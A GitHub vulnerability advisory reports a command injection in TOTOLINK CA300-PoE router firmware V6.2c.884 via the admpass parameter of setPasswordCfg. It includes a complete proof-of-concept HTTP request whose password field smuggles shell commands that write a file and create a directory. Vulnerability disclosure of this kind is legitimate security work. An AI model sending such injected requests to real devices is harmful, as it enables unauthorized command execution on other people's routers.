Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admpass parameter in the function setPasswordCfg

Description

TOTOLINK Router CA300-PoE V6.2c.884 was found to contain a command injection vulnerability in setPasswordCfg.

image-20230112103759214

Firmware information

Affected version

Version: V6.2c.884

image-20230112103905821

Vulnerability details

POC:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 100
Origin: http://192.168.0.254
Connection: keep-alive
Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
Cookie: SESSION_ID=2:1673492439:2

{'topicurl' : "setting/setPasswordCfg", "admuser":"testuser", "admpass":"11>/tmp/text.txt&mkdir /test2222&echo test:test"}

image-20230112170359673

image-20230112165037971

Folder created successfully

image-20230112170843189